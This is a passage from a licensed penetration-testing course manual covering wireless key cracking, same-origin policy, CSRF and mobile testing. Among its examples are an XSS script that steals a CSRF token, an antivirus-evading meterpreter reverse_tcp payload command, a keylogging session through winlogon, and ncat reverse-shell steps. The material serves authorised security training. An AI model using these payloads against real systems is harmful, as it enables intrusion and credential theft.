©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
34/70
Wep Cracking
•Very simple and can be performed quickly if your network reach is sufficient.
•May require external Wireless card for packet injection
•If reach is not sufficient, external antennas such as the Yagi can be used
•A number of tools exist that will crack a WEP key for you – the most known of which is Aircrack-ng. Backtrack
includes the entire toolset required

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
35/70
WPA/WPA2 Bruteforcing – Bruteforcing is all you get
•While WPA-TKIP has it’s vulnerabilities – the maximum those will get you at the time of this writing is minor
packet injection/modification
•Bruteforcing of Pre-shared keys are the only attacks possible against WPA/WPA2 at this time
•You will be amazed at how many times you will encounter short and weak PSK’s on engagements. Bruteforcing
with a custom + good dictionary is worth your time and effort
•It is possible to grab the encrypted key from the 4 way handshake between client and router
•Offline cracking using Rainbow Tables is possible, however since the SSID’s are used as a salt when hashing
the key, public rainbow tables only exist for known SSID making attacks against dictionary passwords
feasible
Further notes and tools
The Church of Wifi has rainbow tables for bruteforcing WPA/2 built against the 1000 most common SSIDs-
http://www.renderlab.net/projects/WPA-tables/
Use Aircrack-ng or coWPAtty (http://www.wirelessdefence.org/Contents/coWPAttyMain.htm) to bruteforce

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
36/70
Other Useful Wireless Techniques
•Deauth a WPA/WPA2 connected client to grab their handshake for offline cracking
•Hidden SSID’s are not really hidden. Using Airmon-ng or other wireless tools, it is possible to detect hidden AP’s
from requests sent to it by other clients
•A MAC Whitelist approach on the AP is not really access control either. You can see current client + AP
associations and spoof your MAC address to be allowed in

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
37/70
Ability to understand web application vulnerabilities and how applications can be exploited
The core problem for Web Applications is that
Users have complete control over the client end:
Can submit arbitrary input
Can modify all data passing between browser and server
Can send requests and parameters in any sequence
Can use tools alongside / instead of the browser
Most attacks involve sending crafted or unexpected input:
Changing a hidden price field
Modifying a session token
Injecting code into back-end components

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
38/70
Normally Pen Testers come across multiple vulnerabilities when assessing a web application and these top 10
tend to vary from time to time.
I.e. In early days of SQL injections most application were affected by this devastating vulnerability and although
still present in number of developments they are more obscure and difficult to get things out of it.
Cross-Site Request Forgery seems to be one of the key findings in most applications as developers and
technology seems to find it difficult to have a robust solution throughout the web app spectrum.
We won’t put any specific weight on any of them as all vulnerabilities can only be rated on its own context. In
another words a Cross-Site Scripting vulnerability in one application can be of low risk or non-existent and in
some others, such as Banks, can be very high. Customer perceptions plays a role in this as well, therefore top 10
only would mean taking into considerations common vulnerabilities (occurrences) found within the last decade.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
39/70
Same Origin Policy is one of the main browser security feature in modern browsers that came to light on
common web application security issues, such as Cross Site Scripting.
The principal idea for this mechanism is to allow unrestrained scripting and other interactions between pages
served as part of the same site or ‘domain’ (usually understood as being part of the same DNS hostname or part
thereof), while preventing any interference between unrelated (and usually interconnected) sites.
Having said that it is worth mentioning that some browser vulnerabilities in the past, such as Cross-Domain bugs,
existed (and still might exist) which allowed malicious websites steal sensitive information by exploiting this or in
conjunction with other vulnerabilities.
Although the SOP (Same origin Policy) can get complicated as different OS and developers have been improving
client side browsing experience and security over the years (please visit the following article for further
information https://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy) the basic principle is to avoid
cross-domain issues as to prevent other domains from accessing sensitive information which doesn’t belong to
them. Mainly Cookies which usually contains session IDs etc.
A detailed comparison of several flavors of same-origin policies implemented by different companies can be
found here:
https://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
40/70
Further information
http://en.wikipedia.org/wiki/Same-origin_policy
Relaxing the same-origin policy
In some circumstances the same-origin policy is too restrictive, posing problems for large websites that use
multiple subdomains. Here are four techniques for relaxing it:
document.domain property
If two windows (or frames) contain scripts that set domain to the same value, the same-origin policy is relaxed for
these two windows, and each window can interact with the other. For example, cooperating scripts in documents
loaded from orders.example.com and catalog.example.com might set their document.domain properties to
“example.com”, thereby making the documents appear to have the same origin and enabling each document to
read properties of the other. This might not always work as the port stored in the internal representation can
become marked as null. In other words example.com port 80 will become example.com port null because we
update document.domain. Port null might not be treated as 80 (depending on your browser) and hence might fail
or succeed depending on your browser.
Cross-Origin Resource Sharing
The second technique for relaxing the same-origin policy is being standardized under the name Cross-Origin
Resource Sharing. This draft standard extends HTTP with a new Origin request header and a new Access-
Control-Allow-Origin response header. It allows servers to use a header to explicitly list origins that may request
a file or to use a wildcard and allow a file to be requested by any site. Browsers such as Firefox 3.5 and Safari 4
use this new header to allow the cross-origin HTTP requests with XMLHttpRequest that would otherwise have
been forbidden by the same-origin policy.
Cross-document messaging
Another new technique, cross-document messaging allows a script from one page to pass textual messages to a
script on another page regardless of the script origins. Calling the postMessage() method on a Window object
asynchronously fires an "onmessage" event in that window, triggering any user-defined event handlers. A script
in one page still cannot directly access methods or variables in the other page, but they can communicate safely
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
41/70
through this message-passing technique.
JSONP
JSONP allows a page to receive JSON data from a different domain by adding a <script> element to the page
which loads a JSON response from a different domain.
Getting Around SOP for Pen Testing
There are ways to turn off same origin policy in browsers. This can be exploited by attackers during targeted
attacks on certain individuals. If an attacker can have physical access to the target system, he can turn off the
SOP in that browser and can then launch his attack later on to steal certain information from the websites
browsed by the user. Below are the options to turn off SOP in different browsers.
Internet Explorer:
-> Go to the Security tab. For the current zone click the ‘Custom level’ button.
-> In the next window, look for ‘Miscellaneous > Access data sources across domains’ and set it to “Disable”.
Mozilla:
-> Open the Mozilla browser and enter ‘about:config’
-> Search for security.fileuri.strict_origin_policy and change the value to false by double clicking it as shown
below.
Google Chrome: -> Start the chrome by passing the below argument:
C:\Program Files\Chrome\Chrome.exe –disable-web-security
Safari: -> Start the Safari by passing the below argument:
C:\Program Files\Safari\Safari.exe –disable-web-security

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
42/70
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
43/70
SSL should be used for authentication and ideally it should be used across a web application to protect all traffic
in transit.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
44/70
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
45/70
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
46/70
CSRF Common vulnerability pattern.
The core problem:
•Web Browsers automatically include credentials in every request sent to the Server/App.
•These include requests caused by a script, form or images from another site.
•Almost all Web Apps ‘trust’ requests sent with valid (automatic) credentials to execute sensitive actions.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
47/70
CSRF Common vulnerability pattern
The Core Problem
•Web browsers automatically include most credentials with each request
•Even for requests caused by a form, script, or image on another site!!
•Credentials are vulnerable!(almost all sites are this way)

Automatically Provided Credentials

•Session cookie
•Basic authentication header
•IP address
•Client side SSL certificates
•Windows domain authentication
So what about a XSS flaw in another application that belongs to the same-origin?
A common observation being found during Pen Testing is that most CSRF token protected web applications use
a cryptographically strong random token value and store it inside the web session.
This token is then sent along with every POST request (often as hidden form fields) in order to protect state-
modifying POST requests (well implemented).
It is well known that GET requests, as long as they are not used to modify state, are often not susceptible to
CSRF attacks and therefore not protected with tokens. Even further, using CSRF tokens on GET requests
exposes them to other risks of leakage (think of logs, browser histories, bookmarks, etc.). And this is exactly
where the problem lies: Web applications that only protect POST requests using CSRF tokens can be attacked
from a XSS vulnerability of another (maybe not so relevant) application running within the same-origin policy
context. Just think of a forum and a store sharing the same-origin.
The following scenario illustrates the use of XMLHttpRequest injected into an application vulnerable to a XSS
within the same-origin.
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
48/70
An online-shop is running at https://www.example.com/shop which has a well implemented CSRF tokens in
place for all of its POST requests. Users can login using their credentials and enter a secured realm of the shop.
The only user-visible entry-point into this secured realm is a simple form based username/password dialog. This
hypothetical online-shop has no XSS vulnerabilities. But on the same domain a public forum of the shop owning
company is running at https://www.example.com/forum forum which unfortunately is affected by a XSS
vulnerability.
Now an attacker can inject the following JavaScript code which allows the retrieval of the HTML code (in case the
victim is logged in at the shop) of the secured realm, which includes the CSRF token that protects POST
requests:
“// retrieve page content”
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://www.example.com/shop/viewBalance", false);
xhr.withCredentials=true;
xhr.send(null);
“// extract CSRF token from page content”
var token = xhr.responseText;
var pos = token.indexOf("csrftoken");
token = token.substring(pos,token.length).substr(12,50);
“// now execute the CSRF attack using XHR along with the extracted token”
xhr.open("POST", "https://www.example.com/shop/bidForProduct", false);
xhr.withCredentials=true;
var params = "productId=999929&vbid=£20&csrftoken="+token;
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.setRequestHeader("Content-length", params.length);
xhr.send(params);
This JavaScript code, injected via the XSS flaw, simply issues synchronous XHRs (XMLHttpRequest) from the
XSS-vulnerable page of example.com's forum to the example.com's shop. Because of the fact that this XHR is
same-origin with the targeted shop application, it is capable of reading the response of the first GET request
(here the account viewing page) along with the CSRF protection token.
The second XHR simply executes the CSRF attack using the extracted protection token. So in this scenario a
less important forum application (having a single XSS) compromises the complete CSRF protection of
the more important shop application (which itself had no XSS flaws and a CSRF implementation). That
still holds true even when both applications have their session cookies properly path-scoped to avoid direct
accesses from each other.
The root problem here is that the CSRF protection style, of only securing POST requests with tokens, is
susceptible to break when combined with XSS attacks even in other applications running same-origin with the
protected application.
Now, how can this be solved? Ideally GET requests (even though they are usually not state-modifying) should be
protected using CSRF tokens. But because GET request parameters are leaked in server logs, the token used
to protect GET requests should be a different one from the token protecting POST requests.
To be even more secure, the client could use a different token for every page or better still: renew the tokens
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
49/70
after each use. Unfortunately this approach has certain problems with browser back buttons and asynchronous
requests but, nevertheless, it is, over all, a good solution.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
50/70
Basic Cross-Site Scripting identification, SQLi and CSRF
The basic idea here is to be able to setup BURP proxy as to identify these common vulnerabilities in a Web Site
(such as Gruyere from Google or our PECB VM)
Duration of this activity no longer than 30minutes. It usually takes time for non-experience web app testers to
setup the required environment. These vulnerabilities can be identified, even without specific tools and by
observing the web app behaviour and client side source code inspection.
Tools that can be used instead of BURP Suite are:
Fiddler Debugger (Windows Only)
Paros Proxy (Java)
Webscarab (Java)
Burp proxy (Java)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
51/70
Methodology Tips
The basic Pen Testing methodology used across this course can also be applied to Mobile Security
Recon — Identify the types of mobile devices used in a target environment, and the applications used.
Consider using social networking data ("Posted with Tweetie for iOS"), e-mail headers ("X-Mailer: iPhone Mail
(10B143)") or Satori fingerprints for insider or public network/hotspot attacks.
Scanning — For local mobile device attacks, identify the wireless networks sought by the mobile device by
inspecting network probes. Commonly weak network names such as "attwifi" and "linksys" are easy targets to
impersonate and lure a victim into a hostile network.
Exploitation — Use man-in-the-middle attacks to intercept and inspect network protocols. Use traffic insertion
attacks to deliver client-side exploits to vulnerable devices, or manipulate captured traffic to exploit supporting
back-end mobile application servers. If you have physical possession of a device, bypass device passcode use
by physically connecting the device to an attack workstation to root or jailbreak the device, exposing the
filesystem data.
Post-Exploitation — Inspect commonly sensitive data areas on mobile devices for information such as the
Notes, SMS, and browser history databases. Look for stored passwords in third-party applications, and for
opportunities to extract saved passwords from keychain storage. If it is within scope, consider adding a backdoor
to the mobile device and returning to the end-user, giving you remote access to trusted networks.
Quick Activity for participants – What would be a Scoping - Mobile Questionnaire?
Which mobile platforms?
Will source code be available?
What is the high-level purpose of the application?
Does it use transport level encryption?
Does it have jailbreak detection if running on iOS / Android?
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
52/70
Does it store on device personal information?
Does it store on device other sensitive information?
What are the expected uses, to help evaluate Android Permissions defined?

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
53/70
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
54/70
Ability to understand mobile device vulnerabilities and how such devices can be exploited
Mobile Pen testing can spawn in multiple areas of exploration.
Mobile Applications
Apps that run on mobile devices. Developers can make mistakes when implementing their own apps or can even
open new attack vectors. Although most platforms offer specific security solutions and guidelines on how to
develop these apps, Pen Testers should be reviewing that they are followed and that can not be subverted etc.
Mobile Devices
Hardware integration / The device itself
Extensibility Ports / Memory extensions etc
When Pen Testing a device the approach most likely will be a Black Box assessment, in which client would like to
play the scenarios of a device being stolen or a device that it’s been used for taking payments / traffic
enforcements etc.
Infrastructure also plays a big part on this type of assessment such as reviewing WiFi / Bluetooth / SMS or any
other comms available to the Device
Mobile OS Specific
OS specific flaws
Jailbreaking / Debugging
Understanding how each Mobile manufacture and OS integrates with the applications and development process
is crucial at time of Pen Testing Mobile Security. The signature process and how applications can bypass or
detect if a device has been jailbreak can strengthen or weaken a Mobile Solution for an organization.
Web Mobile
Apps using web integrations / PhoneGap/Cordova scripting
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
55/70
Web Apps through mobiles
Web Mobile is increasing in numbers as most companies are developing platform independent applications
running powerful integrations in between the remote web application and the underlying OS.
This approach gives certain flexibility and control from the server side of things for updates, tweaks and
functionality as applications’ changes don’t need to be re-published on specific app stores. Though, it brings a
new bag of attack vectors in which a bad implementation could allow JavaScript execution on the phone’s
context and potentially hardware interaction such as take a picture or video from the camera or read a file from
the file system.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
56/70
Methodology Tips
The basic Pen Testing methodology used across this course can also be applied to Mobile Security
Recon — Identify the types of mobile devices used in a target environment, and the applications used.
Consider using social networking data ("Posted with Tweetie for iOS"), e-mail headers ("X-Mailer: iPhone Mail
(10B143)") or Satori fingerprints for insider or public network/hotspot attacks.
Scanning — For local mobile device attacks, identify the wireless networks sought by the mobile device by
inspecting network probes. Commonly weak network names such as "attwifi" and "linksys" are easy targets to
impersonate and lure a victim into a hostile network.
Exploitation — Use man-in-the-middle attacks to intercept and inspect network protocols. Use traffic insertion
attacks to deliver client-side exploits to vulnerable devices, or manipulate captured traffic to exploit supporting
back-end mobile application servers. If you have physical possession of a device, bypass device passcode use
by physically connecting the device to an attack workstation to root or jailbreak the device, exposing the
filesystem data.
Post-Exploitation — Inspect commonly sensitive data areas on mobile devices for information such as the
Notes, SMS, and browser history databases. Look for stored passwords in third-party applications, and for
opportunities to extract saved passwords from keychain storage. If it is within scope, consider adding a backdoor
to the mobile device and returning to the end-user, giving you remote access to trusted networks.
Quick Activity for participants – What would be a Scoping - Mobile Questionnaire?
Which mobile platforms?
Will source code be available?
What is the high-level purpose of the application?
Does it use transport level encryption?
Does it have jailbreak detection if running on iOS / Android?
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
57/70
Does it store on device personal information?
Does it store on device other sensitive information?
What are the expected uses, to help evaluate Android Permissions defined?

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
58/70
Mobile Devices Pen Testing using Social Engineering methodologies to evaluate the security posture of
an organization.
Web form impersonation
Phishing tests seeded with links to web forms designed to capture and record user-entered data, such as
usernames, passwords or other sensitive data in order to assess data leakage through the use of mobile devices.
Fake wireless access points
Impersonate valid wireless access points in an attempt to trick users into connecting their devices capturing
sensitive data and potentially carry out Man-in-the-middle attacks.
Phishing emails and SMS
Send emails and texts to determine whether the organization’s employees would fall prey to phishing and spear
phishing attacks either by clicking through to rogue controlled sites and/or installing arbitrary mobile apps.
Wireless man-in-the-middle (MITM) attacks
Identifies and monitors wireless networks that have either no encryption or WEP-based encryption and observe
any connected devices

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
59/70
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
60/70
Privacy Issues are usually related to the following entry points:
• UDID & Mac ID on iOS Devices
• Geo Locations stored by apps
• Local data storage analysis
• Plist files and XML files
• Sqlite files
• Temporary Files
• Keyboard cache
• Snapshot storage
• Clipboard cache
• Error Logs, etc
Further information about URL Schemes security can be found here:
http://software-security.sans.org/blog/2010/11/08/insecure-handling-url-schemes-apples-ios/
OWASP Mobile Top 10

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
61/70
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
62/70
Note for AV testing during PT:

msfpayload can be piped through msfencode tools to further encode the binaries created and attempt to avoid
antivirus detection.

msfpayload windows/meterpreter/reverse_tcp LHOST 5 {YOUR_IP} LPORT 5 {PORT} R j msfencode -e

x86/countdown -c 2 -t raw j msfencode x -t exe -e x86/shikata_ga_nai -c 3 -k -o /root/backdoors/encoded-
payload.exe

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
63/70
Note for AV testing during PT:

msfpayload can be piped through msfencode tools to further encode the binaries created and attempt to avoid
antivirus detection.

msfpayload windows/meterpreter/reverse_tcp LHOST 5 {YOUR_IP} LPORT 5 {PORT} R j msfencode -e

x86/countdown -c 2 -t raw j msfencode x -t exe -e x86/shikata_ga_nai -c 3 -k -o /root/backdoors/encoded-
payload.exe

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
64/70
Note for AV testing during PT:

msfpayload can be piped through msfencode tools to further encode the binaries created and attempt to avoid
antivirus detection.

msfpayload windows/meterpreter/reverse_tcp LHOST 5 {YOUR_IP} LPORT 5 {PORT} R j msfencode -e

x86/countdown -c 2 -t raw j msfencode x -t exe -e x86/shikata_ga_nai -c 3 -k -o /root/backdoors/encoded-
payload.exe

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
65/70
Licensed to Synergy Innovation Group (contact@synergy-innov.com)
©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
66/70
Furthermore, metasploit would allow you to ‘migrate’ to the winlogon process to capture system login information.
This will capture the credentials of all users logging into the system.

meterpreter > ps

Process list
=================

PID Name Path

--- ---- ----
401 winlogon.exe C:\WINNT\system32\winlogon.exe

meterpreter > migrate 401

[*] Migrating to 401...

[*] Migration completed successfully.

meterpreter > keyscan_start

Starting the keystroke sniffer…

meterpreter > keyscan_dump

Dumping captured keystrokes...
Administrator Ch@ng3M30nLog1n!

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
67/70
Perform a quick socket connection using ncat (nmap installation will deploy ncat) to demonstrate the concept and
the principle of reverse shell for further exploitations.
Activity approximately 10 minutes.
Computer a) ncat –l –v –p 9999 -vv
Computer b) ncat <computer (a) IP address> <port> -vv

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
68/70
 Page for Note Taking

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
69/70
 Page for Note Taking

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
70/70